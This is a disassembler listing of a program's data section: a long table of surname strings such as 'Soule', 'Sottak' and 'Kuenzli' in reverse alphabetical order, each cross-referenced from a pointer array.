aSoule db 'Soule',0 ; DATA XREF: .data:0042E8F0�o
align 4
aSoukup db 'Soukup',0 ; DATA XREF: .data:0042E8EC�o
align 10h
aSottak db 'Sottak',0 ; DATA XREF: .data:0042E8E8�o
align 4
aSorg db 'Sorg',0 ; DATA XREF: .data:0042E8E4�o
align 10h
aSorabella db 'Sorabella',0 ; DATA XREF: .data:0042E8E0�o
align 4
aSommariva db 'Sommariva',0 ; DATA XREF: .data:0042E8DC�o
align 4
aSomers db 'Somers',0 ; DATA XREF: .data:0042E8D8�o
align 10h
aSolon db 'Solon',0 ; DATA XREF: .data:0042E8D4�o
align 4
aSocolow db 'Socolow',0 ; DATA XREF: .data:0042E8D0�o
aSnodgrass db 'Snodgrass',0 ; DATA XREF: .data:0042E8CC�o
align 4
aSniffen db 'Sniffen',0 ; DATA XREF: .data:0042E8C8�o
aSmilow db 'Smilow',0 ; DATA XREF: .data:0042E8C4�o
align 4
aSlowe db 'Slowe',0 ; DATA XREF: .data:0042E8C0�o
align 4
aSloan db 'Sloan',0 ; DATA XREF: .data:0042E8BC�o
align 4
aSkoda db 'Skoda',0 ; DATA XREF: .data:0042E8B8�o
align 4
aSkerry db 'Skerry',0 ; DATA XREF: .data:0042E8B4�o
align 4
aSkane db 'Skane',0 ; DATA XREF: .data:0042E8B0�o
align 4
aSites db 'Sites',0 ; DATA XREF: .data:0042E8AC�o
align 4
aSirilli db 'Sirilli',0 ; DATA XREF: .data:0042E8A8�o
aSinsabaugh db 'Sinsabaugh',0 ; DATA XREF: .data:0042E8A4�o
align 10h
aSilvetti db 'Silvetti',0 ; DATA XREF: .data:0042E8A0�o
align 4
aSilverman db 'Silverman',0 ; DATA XREF: .data:0042E89C�o
align 4
aSigna db 'Signa',0 ; DATA XREF: .data:0042E898�o
align 10h
aSigini db 'Sigini',0 ; DATA XREF: .data:0042E894�o
align 4
aSigalot db 'Sigalot',0 ; DATA XREF: .data:0042E890�o
aSiesto db 'Siesto',0 ; DATA XREF: .data:0042E88C�o
align 4
aShimon db 'Shimon',0 ; DATA XREF: .data:0042E888�o
align 10h
aShibata db 'Shibata',0 ; DATA XREF: .data:0042E884�o
aShia db 'Shia',0 ; DATA XREF: .data:0042E880�o
align 10h
aShesko db 'Shesko',0 ; DATA XREF: .data:0042E87C�o
align 4
aShepstone db 'Shepstone',0 ; DATA XREF: .data:0042E878�o
align 4
aSheppard db 'Sheppard',0 ; DATA XREF: .data:0042E874�o
align 10h
aShepherd db 'Shepherd',0 ; DATA XREF: .data:0042E870�o
align 4
aSheats db 'Sheats',0 ; DATA XREF: .data:0042E86C�o
align 4
aShea db 'Shea',0 ; DATA XREF: .data:0042E868�o
align 4
aShavelson db 'Shavelson',0 ; DATA XREF: .data:0042E864�o
align 4
aShatrov db 'Shatrov',0 ; DATA XREF: .data:0042E860�o
aShar db 'Shar',0 ; DATA XREF: .data:0042E85C�o
align 4
aShanley db 'Shanley',0 ; DATA XREF: .data:0042E858�o
aShankland db 'Shankland',0 ; DATA XREF: .data:0042E854�o
align 4
aShakis db 'Shakis',0 ; DATA XREF: .data:0042E850�o
align 4
aShaikh db 'Shaikh',0 ; DATA XREF: .data:0042E84C�o
align 4
aSeyfert db 'Seyfert',0 ; DATA XREF: .data:0042E848�o
aSexton db 'Sexton',0 ; DATA XREF: .data:0042E844�o
align 4
aSeterdahl db 'Seterdahl',0 ; DATA XREF: .data:0042E840�o
align 4
aSennett db 'Sennett',0 ; DATA XREF: .data:0042E83C�o
aSen db 'Sen',0 ; DATA XREF: .data:0042E838�o
aSelvage db 'Selvage',0 ; DATA XREF: .data:0042E834�o
aSekler db 'Sekler',0 ; DATA XREF: .data:0042E830�o
align 4
aSegal db 'Segal',0 ; DATA XREF: .data:0042E82C�o
align 4
aSeeber db 'Seeber',0 ; DATA XREF: .data:0042E828�o
align 4
aSeaton db 'Seaton',0 ; DATA XREF: .data:0042E824�o
align 4
aScudder db 'Scudder',0 ; DATA XREF: .data:0042E820�o
aScovel db 'Scovel',0 ; DATA XREF: .data:0042E81C�o
align 4
aSchwickrath db 'Schwickrath',0 ; DATA XREF: .data:0042E818�o
aSchwan db 'Schwan',0 ; DATA XREF: .data:0042E814�o
align 10h
aSchuyler db 'Schuyler',0 ; DATA XREF: .data:0042E810�o
align 4
aSchutte db 'Schutte',0 ; DATA XREF: .data:0042E80C�o
aSchuman db 'Schuman',0 ; DATA XREF: .data:0042E808�o
aSchossberger db 'Schossberger',0 ; DATA XREF: .data:0042E804�o
align 4
aSchmitt db 'Schmitt',0 ; DATA XREF: .data:0042E800�o
aSchilling db 'Schilling',0 ; DATA XREF: .data:0042E7FC�o
align 10h
aSchifini db 'Schifini',0 ; DATA XREF: .data:0042E7F8�o
align 4
aSchiano db 'Schiano',0 ; DATA XREF: .data:0042E7F4�o
aScheiner db 'Scheiner',0 ; DATA XREF: .data:0042E7F0�o
align 10h
aScharlemann db 'Scharlemann',0 ; DATA XREF: .data:0042E7EC�o
aScharf db 'Scharf',0 ; DATA XREF: .data:0042E7E8�o
align 4
aScepan db 'Scepan',0 ; DATA XREF: .data:0042E7E4�o
align 4
aScarponi db 'Scarponi',0 ; DATA XREF: .data:0042E7E0�o
align 4
aSayied db 'Sayied',0 ; DATA XREF: .data:0042E7DC�o
align 10h
aSawtell db 'Sawtell',0 ; DATA XREF: .data:0042E7D8�o
aSatterthwaite db 'Satterthwaite',0 ; DATA XREF: .data:0042E7D4�o
align 4
aSatta db 'Satta',0 ; DATA XREF: .data:0042E7D0�o
align 10h
aSatin db 'Satin',0 ; DATA XREF: .data:0042E7CC�o
align 4
aSase db 'Sase',0 ; DATA XREF: .data:0042E7C8�o
align 10h
aSartore db 'Sartore',0 ; DATA XREF: .data:0042E7C4�o
aSarin db 'Sarin',0 ; DATA XREF: .data:0042E7C0�o
align 10h
aSapers db 'Sapers',0 ; DATA XREF: .data:0042E7BC�o
align 4
aSanna db 'Sanna',0 ; DATA XREF: .data:0042E7B8�o
align 10h
aSanchezRamirez db 'Sanchez-Ramirez',0 ; DATA XREF: .data:0042E7B4�o
aSamson db 'Samson',0 ; DATA XREF: .data:0042E7B0�o
align 4
aSali db 'Sali',0 ; DATA XREF: .data:0042E7AC�o
align 10h
aSahu db 'Sahu',0 ; DATA XREF: .data:0042E7A8�o
align 4
aSafire db 'Safire',0 ; DATA XREF: .data:0042E7A4�o
align 10h
aSadler db 'Sadler',0 ; DATA XREF: .data:0042E7A0�o
align 4
aSabatello db 'Sabatello',0 ; DATA XREF: .data:0042E79C�o
align 4
aRyu db 'Ryu',0 ; DATA XREF: .data:0042E798�o
aRush db 'Rush',0 ; DATA XREF: .data:0042E794�o
align 10h
aRuescher db 'Ruescher',0 ; DATA XREF: .data:0042E790�o
align 4
aRuderman db 'Ruderman',0 ; DATA XREF: .data:0042E78C�o
align 4
aRuan db 'Ruan',0 ; DATA XREF: .data:0042E788�o
align 10h
aRu db 'Ru',0 ; DATA XREF: .data:0042E784�o
align 4
aRoyal db 'Royal',0 ; DATA XREF: .data:0042E780�o
align 4
aRow db 'Row',0 ; DATA XREF: .data:0042E77C�o
aRonen db 'Ronen',0 ; DATA XREF: .data:0042E778�o
align 4
aRogers db 'Rogers',0 ; DATA XREF: .data:0042E774�o
align 10h
aRoesler db 'Roesler',0 ; DATA XREF: .data:0042E770�o
aRocha db 'Rocha',0 ; DATA XREF: .data:0042E76C�o
align 10h
aRobinson db 'Robinson',0 ; DATA XREF: .data:0042E768�o
align 4
aRivera db 'Rivera',0 ; DATA XREF: .data:0042E764�o
align 4
aRish db 'Rish',0 ; DATA XREF: .data:0042E760�o
align 4
aRineer db 'Rineer',0 ; DATA XREF: .data:0042E75C�o
align 4
aRindos db 'Rindos',0 ; DATA XREF: .data:0042E758�o
align 4
aRielly db 'Rielly',0 ; DATA XREF: .data:0042E754�o
align 4
aRichmond db 'Richmond',0 ; DATA XREF: .data:0042E750�o
align 10h
aRhea db 'Rhea',0 ; DATA XREF: .data:0042E74C�o
align 4
aResnik db 'Resnik',0 ; DATA XREF: .data:0042E748�o
align 10h
aRepetto db 'Repetto',0 ; DATA XREF: .data:0042E744�o
aRenick db 'Renick',0 ; DATA XREF: .data:0042E740�o
align 10h
aRemak db 'Remak',0 ; DATA XREF: .data:0042E73C�o
align 4
aReinold db 'Reinold',0 ; DATA XREF: .data:0042E738�o
aCunningham db 'Cunningham',0 ; DATA XREF: .data:0042E734�o
align 4
aReedquist db 'Reedquist',0 ; DATA XREF: .data:0042E730�o
align 4
aReddenTyler db 'Redden-Tyler',0 ; DATA XREF: .data:0042E72C�o
align 4
aRayport db 'Rayport',0 ; DATA XREF: .data:0042E728�o
aRapple db 'Rapple',0 ; DATA XREF: .data:0042E724�o
align 4
aRankin db 'Rankin',0 ; DATA XREF: .data:0042E720�o
align 10h
aRangan db 'Rangan',0 ; DATA XREF: .data:0042E71C�o
align 4
aRaney db 'Raney',0 ; DATA XREF: .data:0042E718�o
align 10h
aRajagopalan db 'Rajagopalan',0 ; DATA XREF: .data:0042E714�o
aRadeke db 'Radeke',0 ; DATA XREF: .data:0042E710�o
align 4
aRabkin db 'Rabkin',0 ; DATA XREF: .data:0042E70C�o
align 4
aRabe db 'Rabe',0 ; DATA XREF: .data:0042E708�o
align 4
aQuetin db 'Quetin',0 ; DATA XREF: .data:0042E704�o
align 4
aQuaday db 'Quaday',0 ; DATA XREF: .data:0042E700�o
align 4
aPynchon db 'Pynchon',0 ; DATA XREF: .data:0042E6FC�o
aPugh db 'Pugh',0 ; DATA XREF: .data:0042E6F8�o
align 4
aPuccia db 'Puccia',0 ; DATA XREF: .data:0042E6F4�o
align 4
aProthrowStith db 'Prothrow-Stith',0 ; DATA XREF: .data:0042E6F0�o
align 4
aProietti db 'Proietti',0 ; DATA XREF: .data:0042E6EC�o
align 4
aPritz db 'Pritz',0 ; DATA XREF: .data:0042E6E8�o
align 10h
aPritchard db 'Pritchard',0 ; DATA XREF: .data:0042E6E4�o
align 4
aPrevost db 'Prevost',0 ; DATA XREF: .data:0042E6E0�o
aPreucel db 'Preucel',0 ; DATA XREF: .data:0042E6DC�o
aPresper db 'Presper',0 ; DATA XREF: .data:0042E6D8�o
aPowers db 'Powers',0 ; DATA XREF: .data:0042E6D4�o
align 4
aPoolman db 'Poolman',0 ; DATA XREF: .data:0042E6D0�o
aPoma db 'Poma',0 ; DATA XREF: .data:0042E6CC�o
align 4
aPolitis db 'Politis',0 ; DATA XREF: .data:0042E6C8�o
aPolanyi db 'Polanyi',0 ; DATA XREF: .data:0042E6C4�o
aPolak db 'Polak',0 ; DATA XREF: .data:0042E6C0�o
align 4
aPoirier db 'Poirier',0 ; DATA XREF: .data:0042E6BC�o
aPointer db 'Pointer',0 ; DATA XREF: .data:0042E6B8�o
aPoincaire db 'Poincaire',0 ; DATA XREF: .data:0042E6B4�o
align 10h
aPocobene db 'Pocobene',0 ; DATA XREF: .data:0042E6B0�o
align 4
aPo db 'Po',0 ; DATA XREF: .data:0042E6AC�o
align 10h
aPlous db 'Plous',0 ; DATA XREF: .data:0042E6A8�o
align 4
aPlasket db 'Plasket',0 ; DATA XREF: .data:0042E6A4�o
aPlant db 'Plant',0 ; DATA XREF: .data:0042E6A0�o
align 4
aPlancon db 'Plancon',0 ; DATA XREF: .data:0042E69C�o
aPinot db 'Pinot',0 ; DATA XREF: .data:0042E698�o
align 4
aPilbeam db 'Pilbeam',0 ; DATA XREF: .data:0042E694�o
aPfister db 'Pfister',0 ; DATA XREF: .data:0042E690�o
aPettit db 'Pettit',0 ; DATA XREF: .data:0042E68C�o
align 10h
aPettibone db 'Pettibone',0 ; DATA XREF: .data:0042E688�o
align 4
aPetruzello db 'Petruzello',0 ; DATA XREF: .data:0042E684�o
align 4
aPeters db 'Peters',0 ; DATA XREF: .data:0042E680�o
align 10h
aPerrimon db 'Perrimon',0 ; DATA XREF: .data:0042E67C�o
align 4
aPerone db 'Perone',0 ; DATA XREF: .data:0042E678�o
align 4
aPerna db 'Perna',0 ; DATA XREF: .data:0042E674�o
align 4
aPerlman db 'Perlman',0 ; DATA XREF: .data:0042E670�o
aPerlak db 'Perlak',0 ; DATA XREF: .data:0042E66C�o
align 4
aPerko db 'Perko',0 ; DATA XREF: .data:0042E668�o
align 4
aPereira db 'Pereira',0 ; DATA XREF: .data:0042E664�o
aPenny db 'Penny',0 ; DATA XREF: .data:0042E660�o
align 4
aPeishel db 'Peishel',0 ; DATA XREF: .data:0042E65C�o
aPederson db 'Pederson',0 ; DATA XREF: .data:0042E658�o
align 4
aPearlberg db 'Pearlberg',0 ; DATA XREF: .data:0042E654�o
align 4
aPeabody db 'Peabody',0 ; DATA XREF: .data:0042E650�o
aPaynter db 'Paynter',0 ; DATA XREF: .data:0042E64C�o
aPawloski db 'Pawloski',0 ; DATA XREF: .data:0042E648�o
align 10h
aPavlon db 'Pavlon',0 ; DATA XREF: .data:0042E644�o
align 4
aPavetti db 'Pavetti',0 ; DATA XREF: .data:0042E640�o
aPattullo db 'Pattullo',0 ; DATA XREF: .data:0042E63C�o
align 4
aPatrick db 'Patrick',0 ; DATA XREF: .data:0042E638�o
aPatefield db 'Patefield',0 ; DATA XREF: .data:0042E634�o
align 10h
aPascucci db 'Pascucci',0 ; DATA XREF: .data:0042E630�o
align 4
aPartridge db 'Partridge',0 ; DATA XREF: .data:0042E62C�o
align 4
aParris db 'Parris',0 ; DATA XREF: .data:0042E628�o
align 10h
aParmeggiani db 'Parmeggiani',0 ; DATA XREF: .data:0042E624�o
aPaoletti db 'Paoletti',0 ; DATA XREF: .data:0042E620�o
align 4
aPantilla db 'Pantilla',0 ; DATA XREF: .data:0042E61C�o
align 4
aPanizzon db 'Panizzon',0 ; DATA XREF: .data:0042E618�o
align 10h
aPanadero db 'Panadero',0 ; DATA XREF: .data:0042E614�o
align 4
aPalmitesta db 'Palmitesta',0 ; DATA XREF: .data:0042E610�o
align 4
aPallara db 'Pallara',0 ; DATA XREF: .data:0042E60C�o
aPalepu db 'Palepu',0 ; DATA XREF: .data:0042E608�o
align 4
aPalayoor db 'Palayoor',0 ; DATA XREF: .data:0042E604�o
align 4
aPaine db 'Paine',0 ; DATA XREF: .data:0042E600�o
align 4
aPaesdealmeida db 'PaesDealmeida',0 ; DATA XREF: .data:0042E5FC�o
align 4
aOvid db 'Ovid',0 ; DATA XREF: .data:0042E5F8�o
align 4
aOuchida db 'Ouchida',0 ; DATA XREF: .data:0042E5F4�o
aOtten db 'Otten',0 ; DATA XREF: .data:0042E5F0�o
align 4
aOttaviani db 'Ottaviani',0 ; DATA XREF: .data:0042E5EC�o
align 10h
aOstrowski db 'Ostrowski',0 ; DATA XREF: .data:0042E5E8�o
align 4
aOspina db 'Ospina',0 ; DATA XREF: .data:0042E5E4�o
align 4
aOrsi db 'Orsi',0 ; DATA XREF: .data:0042E5E0�o
align 4
aOrfield db 'Orfield',0 ; DATA XREF: .data:0042E5DC�o
aOray db 'Oray',0 ; DATA XREF: .data:0042E5D8�o
align 4
aOpel db 'Opel',0 ; DATA XREF: .data:0042E5D4�o
align 4
aOMeara db 'O',27h,'meara',0 ; DATA XREF: .data:0042E5D0�o
aOman db 'Oman',0 ; DATA XREF: .data:0042E5CC�o
align 4
aOMalley db 'O',27h,'malley',0 ; DATA XREF: .data:0042E5C8�o
align 10h
aOlszewski db 'Olszewski',0 ; DATA XREF: .data:0042E5C4�o
align 4
aOlson db 'Olson',0 ; DATA XREF: .data:0042E5C0�o
align 4
aOlsen db 'Olsen',0 ; DATA XREF: .data:0042E5BC�o
align 4
aOldford db 'Oldford',0 ; DATA XREF: .data:0042E5B8�o
aOHagan db 'O',27h,'hagan',0 ; DATA XREF: .data:0042E5B4�o
aOh db 'Oh',0 ; DATA XREF: .data:0042E5B0�o
align 10h
aOgata db 'Ogata',0 ; DATA XREF: .data:0042E5AC�o
align 4
aOcougne db 'Ocougne',0 ; DATA XREF: .data:0042E5A8�o
aNuzum db 'Nuzum',0 ; DATA XREF: .data:0042E5A4�o
align 4
aNotman db 'Notman',0 ; DATA XREF: .data:0042E5A0�o
align 10h
aNitabach db 'Nitabach',0 ; DATA XREF: .data:0042E59C�o
align 4
aNisenson db 'Nisenson',0 ; DATA XREF: .data:0042E598�o
align 4
aNickoloff db 'Nickoloff',0 ; DATA XREF: .data:0042E594�o
align 4
aNickerson db 'Nickerson',0 ; DATA XREF: .data:0042E590�o
align 10h
aNi_0 db 'Ni',0 ; DATA XREF: .data:0042E58C�o
align 4
aNg db 'Ng',0 ; DATA XREF: .data:0042E588�o
align 4
aNewlin db 'Newlin',0 ; DATA XREF: .data:0042E584�o
align 10h
aNewfeld db 'Newfeld',0 ; DATA XREF: .data:0042E580�o
aNeuman db 'Neuman',0 ; DATA XREF: .data:0042E57C�o
align 10h
aNesci db 'Nesci',0 ; DATA XREF: .data:0042E578�o
align 4
aNenna db 'Nenna',0 ; DATA XREF: .data:0042E574�o
align 10h
aNelson db 'Nelson',0 ; DATA XREF: .data:0042E570�o
align 4
aNayduch db 'Nayduch',0 ; DATA XREF: .data:0042E56C�o
aNaviaux db 'Naviaux',0 ; DATA XREF: .data:0042E568�o
aNardone db 'Nardone',0 ; DATA XREF: .data:0042E564�o
aNardi db 'Nardi',0 ; DATA XREF: .data:0042E560�o
align 4
aNapolitano db 'Napolitano',0 ; DATA XREF: .data:0042E55C�o
align 4
aNaddeo db 'Naddeo',0 ; DATA XREF: .data:0042E558�o
align 4
aMussachio db 'Mussachio',0 ; DATA XREF: .data:0042E554�o
align 4
aMumford db 'Mumford',0 ; DATA XREF: .data:0042E550�o
aMulroy db 'Mulroy',0 ; DATA XREF: .data:0042E54C�o
align 4
aMulkern db 'Mulkern',0 ; DATA XREF: .data:0042E548�o
aMugnai db 'Mugnai',0 ; DATA XREF: .data:0042E544�o
align 4
aMuello db 'Muello',0 ; DATA XREF: .data:0042E540�o
align 10h
aMudarri db 'Mudarri',0 ; DATA XREF: .data:0042E53C�o
aMotooka db 'Motooka',0 ; DATA XREF: .data:0042E538�o
aMostafavi db 'Mostafavi',0 ; DATA XREF: .data:0042E534�o
align 4
aMosler db 'Mosler',0 ; DATA XREF: .data:0042E530�o
align 4
aMosher db 'Mosher',0 ; DATA XREF: .data:0042E52C�o
align 4
aMortimer db 'Mortimer',0 ; DATA XREF: .data:0042E528�o
align 4
aMorrow db 'Morrow',0 ; DATA XREF: .data:0042E524�o
align 10h
aMorrison db 'Morrison',0 ; DATA XREF: .data:0042E520�o
align 4
aMoreton db 'Moreton',0 ; DATA XREF: .data:0042E51C�o
aMorani db 'Morani',0 ; DATA XREF: .data:0042E518�o
align 4
aMooredech_ db 'MooreDeCh.',0 ; DATA XREF: .data:0042E514�o
align 4
aMontilio db 'Montilio',0 ; DATA XREF: .data:0042E510�o
align 4
aMonque db 'Monque',0 ; DATA XREF: .data:0042E50C�o
align 4
aMoiamedi db 'Moiamedi',0 ; DATA XREF: .data:0042E508�o
align 4
aMohr db 'Mohr',0 ; DATA XREF: .data:0042E504�o
align 10h
aMoeller db 'Moeller',0 ; DATA XREF: .data:0042E500�o
aModestino db 'Modestino',0 ; DATA XREF: .data:0042E4FC�o
align 4
aMocroft db 'Mocroft',0 ; DATA XREF: .data:0042E4F8�o
aMittal db 'Mittal',0 ; DATA XREF: .data:0042E4F4�o
align 4
aMitropoulos db 'Mitropoulos',0 ; DATA XREF: .data:0042E4F0�o
aGonzalez db 'Gonzalez',0 ; DATA XREF: .data:0042E4EC�o
align 4
aMinichiello db 'Minichiello',0 ; DATA XREF: .data:0042E4E8�o
aMini db 'Mini',0 ; DATA XREF: .data:0042E4E4�o
align 10h
aMinh db 'Minh',0 ; DATA XREF: .data:0042E4E0�o
align 4
aMills db 'Mills',0 ; DATA XREF: .data:0042E4DC�o
align 10h
aMieher db 'Mieher',0 ; DATA XREF: .data:0042E4D8�o
align 4
aMiddle db 'Middle',0 ; DATA XREF: .data:0042E4D4�o
align 10h
aMichelman db 'Michelman',0 ; DATA XREF: .data:0042E4D0�o
align 4
aMeurer db 'Meurer',0 ; DATA XREF: .data:0042E4CC�o
align 4
aMetropolis db 'Metropolis',0 ; DATA XREF: .data:0042E4C8�o
align 10h
aMetelka db 'Metelka',0 ; DATA XREF: .data:0042E4C4�o
aMerz db 'Merz',0 ; DATA XREF: .data:0042E4C0�o
align 10h
aMerseth db 'Merseth',0 ; DATA XREF: .data:0042E4BC�o
aMerminod db 'Merminod',0 ; DATA XREF: .data:0042E4B8�o
align 4
aMerlani db 'Merlani',0 ; DATA XREF: .data:0042E4B4�o
aMerikoski db 'Merikoski',0 ; DATA XREF: .data:0042E4B0�o
align 4
aMenzies db 'Menzies',0 ; DATA XREF: .data:0042E4AC�o
aMemisoglu db 'Memisoglu',0 ; DATA XREF: .data:0042E4A8�o
align 4
aMeccariello db 'Meccariello',0 ; DATA XREF: .data:0042E4A4�o
aMcnulty db 'Mcnulty',0 ; DATA XREF: .data:0042E4A0�o
aMcnealy db 'Mcnealy',0 ; DATA XREF: .data:0042E49C�o
aMclaren db 'Mclaren',0 ; DATA XREF: .data:0042E498�o
aMclane db 'Mclane',0 ; DATA XREF: .data:0042E494�o
align 4
aMckenna db 'Mckenna',0 ; DATA XREF: .data:0042E490�o
aMcintosh db 'Mcintosh',0 ; DATA XREF: .data:0042E48C�o
align 4
aMcilroy db 'McIlroy',0 ; DATA XREF: .data:0042E488�o
aMcgoldrick db 'Mcgoldrick',0 ; DATA XREF: .data:0042E484�o
align 10h
aMcghee db 'Mcghee',0 ; DATA XREF: .data:0042E480�o
align 4
aMcfadden db 'McFadden',0 ; DATA XREF: .data:0042E47C�o
align 4
aMcelroy db 'Mcelroy',0 ; DATA XREF: .data:0042E478�o
aMcdowell db 'Mcdowell',0 ; DATA XREF: .data:0042E474�o
align 4
aMcclearn db 'Mcclearn',0 ; DATA XREF: .data:0042E470�o
align 4
aMccall db 'Mccall',0 ; DATA XREF: .data:0042E46C�o
align 4
aMccaffery db 'Mccaffery',0 ; DATA XREF: .data:0042E468�o
align 4
aMcbride db 'Mcbride',0 ; DATA XREF: .data:0042E464�o
aMazziotta db 'Mazziotta',0 ; DATA XREF: .data:0042E460�o
align 4
aMazzali db 'Mazzali',0 ; DATA XREF: .data:0042E45C�o
aMay db 'May',0 ; DATA XREF: .data:0042E458�o
aMauzy db 'Mauzy',0 ; DATA XREF: .data:0042E454�o
align 10h
aMattson db 'Mattson',0 ; DATA XREF: .data:0042E450�o
aMatsukata db 'Matsukata',0 ; DATA XREF: .data:0042E44C�o
align 4
aMatarazzo db 'Matarazzo',0 ; DATA XREF: .data:0042E448�o
align 10h
aMatalka db 'Matalka',0 ; DATA XREF: .data:0042E444�o
aMass db 'Mass',0 ; DATA XREF: .data:0042E440�o
align 10h
aMarubini db 'Marubini',0 ; DATA XREF: .data:0042E43C�o
align 4
aMarton db 'Marton',0 ; DATA XREF: .data:0042E438�o
align 4
aMartochio db 'Martochio',0 ; DATA XREF: .data:0042E434�o
align 10h
aMartinez db 'Martinez',0 ; DATA XREF: .data:0042E430�o
align 4
aMarques db 'Marques',0 ; DATA XREF: .data:0042E42C�o
aMargetts db 'Margetts',0 ; DATA XREF: .data:0042E428�o
align 10h
aMargalit db 'Margalit',0 ; DATA XREF: .data:0042E424�o
align 4
aMarcus db 'Marcus',0 ; DATA XREF: .data:0042E420�o
align 4
aMarchbanks db 'Marchbanks',0 ; DATA XREF: .data:0042E41C�o
align 10h
aMarch db 'March',0 ; DATA XREF: .data:0042E418�o
align 4
aMantovan db 'Mantovan',0 ; DATA XREF: .data:0042E414�o
align 4
aManganiello db 'Manganiello',0 ; DATA XREF: .data:0042E410�o
aMandel db 'Mandel',0 ; DATA XREF: .data:0042E40C�o
align 4
aManalis db 'Manalis',0 ; DATA XREF: .data:0042E408�o
aMalova db 'Malova',0 ; DATA XREF: .data:0042E404�o
align 4
aMaller db 'Maller',0 ; DATA XREF: .data:0042E400�o
align 10h
aMalatesta db 'Malatesta',0 ; DATA XREF: .data:0042E3FC�o
align 4
aMaisano db 'Maisano',0 ; DATA XREF: .data:0042E3F8�o
aMaineHershey db 'Maine-Hershey',0 ; DATA XREF: .data:0042E3F4�o
align 4
aMaier db 'Maier',0 ; DATA XREF: .data:0042E3F0�o
align 4
aMahony db 'Mahony',0 ; DATA XREF: .data:0042E3EC�o
align 4
aMaggio db 'Maggio',0 ; DATA XREF: .data:0042E3E8�o
align 4
aMadigan db 'Madigan',0 ; DATA XREF: .data:0042E3E4�o
aMacy db 'Macy',0 ; DATA XREF: .data:0042E3E0�o
align 4
aMacmillan db 'MacMillan',0 ; DATA XREF: .data:0042E3DC�o
align 4
aMackenney db 'Mackenney',0 ; DATA XREF: .data:0042E3D8�o
align 4
aMacintyre db 'Macintyre',0 ; DATA XREF: .data:0042E3D4�o
align 10h
aMaceachern db 'Maceachern',0 ; DATA XREF: .data:0042E3D0�o
align 4
aMacdonald db 'Macdonald',0 ; DATA XREF: .data:0042E3CC�o
align 4
aMaccormac db 'Maccormac',0 ; DATA XREF: .data:0042E3C8�o
align 4
aMa db 'Ma',0 ; DATA XREF: .data:0042E3C4�o
align 4
aLuzader db 'Luzader',0 ; DATA XREF: .data:0042E3C0�o
aLutcavage db 'Lutcavage',0 ; DATA XREF: .data:0042E3BC�o
align 4
aLussier db 'Lussier',0 ; DATA XREF: .data:0042E3B8�o
aLuoma db 'Luoma',0 ; DATA XREF: .data:0042E3B4�o
align 4
aLunetta db 'Lunetta',0 ; DATA XREF: .data:0042E3B0�o
aLuecke db 'Luecke',0 ; DATA XREF: .data:0042E3AC�o
align 4
aLuczkow db 'Luczkow',0 ; DATA XREF: .data:0042E3A8�o
aLuciano db 'Luciano',0 ; DATA XREF: .data:0042E3A4�o
aLucas db 'Lucas',0 ; DATA XREF: .data:0042E3A0�o
align 4
aLubin db 'Lubin',0 ; DATA XREF: .data:0042E39C�o
align 4
aLoza db 'Loza',0 ; DATA XREF: .data:0042E398�o
align 4
aLowenstein db 'Lowenstein',0 ; DATA XREF: .data:0042E394�o
align 10h
aLoveman db 'Loveman',0 ; DATA XREF: .data:0042E390�o
aLoss db 'Loss',0 ; DATA XREF: .data:0042E38C�o
align 10h
aLongworth db 'Longworth',0 ; DATA XREF: .data:0042E388�o
align 4
aLocatelli db 'Locatelli',0 ; DATA XREF: .data:0042E384�o
align 4
aLizardo db 'Lizardo',0 ; DATA XREF: .data:0042E380�o
aLivolsi db 'Livolsi',0 ; DATA XREF: .data:0042E37C�o
aLivi db 'Livi',0 ; DATA XREF: .data:0042E378�o
align 10h
aLivernash db 'Livernash',0 ; DATA XREF: .data:0042E374�o
align 4
aLitvak db 'Litvak',0 ; DATA XREF: .data:0042E370�o
align 4
aLittle db 'Little',0 ; DATA XREF: .data:0042E36C�o
align 4
aLipponen db 'Lipponen',0 ; DATA XREF: .data:0042E368�o
align 4
aLippmann db 'Lippmann',0 ; DATA XREF: .data:0042E364�o
align 4
aLinzee db 'Linzee',0 ; DATA XREF: .data:0042E360�o
align 4
aLinehan db 'Linehan',0 ; DATA XREF: .data:0042E35C�o
aLine db 'Line',0 ; DATA XREF: .data:0042E358�o
align 4
aLinder db 'Linder',0 ; DATA XREF: .data:0042E354�o
align 4
aLinda db 'Linda',0 ; DATA XREF: .data:0042E350�o
align 4
aLinares db 'Linares',0 ; DATA XREF: .data:0042E34C�o
aLim db 'Lim',0 ; DATA XREF: .data:0042E348�o
aLightfoot db 'Lightfoot',0 ; DATA XREF: .data:0042E344�o
align 4
aLight db 'Light',0 ; DATA XREF: .data:0042E340�o
align 4
aLiem db 'Liem',0 ; DATA XREF: .data:0042E33C�o
align 4
aLidano db 'Lidano',0 ; DATA XREF: .data:0042E338�o
align 4
aLiakos db 'Liakos',0 ; DATA XREF: .data:0042E334�o
align 4
aLessi db 'Lessi',0 ; DATA XREF: .data:0042E330�o
align 4
aLesser db 'Lesser',0 ; DATA XREF: .data:0042E32C�o
align 4
aLEnclos db 'l',27h,'Enclos',0 ; DATA XREF: .data:0042E328�o
align 10h
aLenard db 'Lenard',0 ; DATA XREF: .data:0042E324�o
align 4
aLeite db 'Leite',0 ; DATA XREF: .data:0042E320�o
align 10h
aLeclercq db 'Leclercq',0 ; DATA XREF: .data:0042E31C�o
align 4
aLecce db 'Lecce',0 ; DATA XREF: .data:0042E318�o
align 4
aLecar db 'Lecar',0 ; DATA XREF: .data:0042E314�o
align 4
aLawless db 'Lawless',0 ; DATA XREF: .data:0042E310�o
aLashley db 'Lashley',0 ; DATA XREF: .data:0042E30C�o
aLaserna db 'Laserna',0 ; DATA XREF: .data:0042E308�o
aLanzit db 'Lanzit',0 ; DATA XREF: .data:0042E304�o
align 4
aLantieri db 'Lantieri',0 ; DATA XREF: .data:0042E300�o
align 4
aLankes db 'Lankes',0 ; DATA XREF: .data:0042E2FC�o
align 10h
aLandes db 'Landes',0 ; DATA XREF: .data:0042E2F8�o
align 4
aLallemant db 'Lallemant',0 ; DATA XREF: .data:0042E2F4�o
; .data:0043294C�o
align 4
aLaing db 'Laing',0 ; DATA XREF: .data:0042E2F0�o
align 4
aLafler db 'Lafler',0 ; DATA XREF: .data:0042E2EC�o
; .data:off_4327E8�o
align 4
aLabunka db 'Labunka',0 ; DATA XREF: .data:0042E2E8�o
aLa db 'La',0 ; DATA XREF: .data:0042E2E4�o
align 10h
aKuwabara db 'Kuwabara',0 ; DATA XREF: .data:0042E2E0�o
align 4
aKusman db 'Kusman',0 ; DATA XREF: .data:0042E2DC�o
align 4
aKumar db 'Kumar',0 ; DATA XREF: .data:0042E2D8�o
align 4
aKuenzli db 'Kuenzli',0 ; DATA XREF: .data:0042E2D4�o
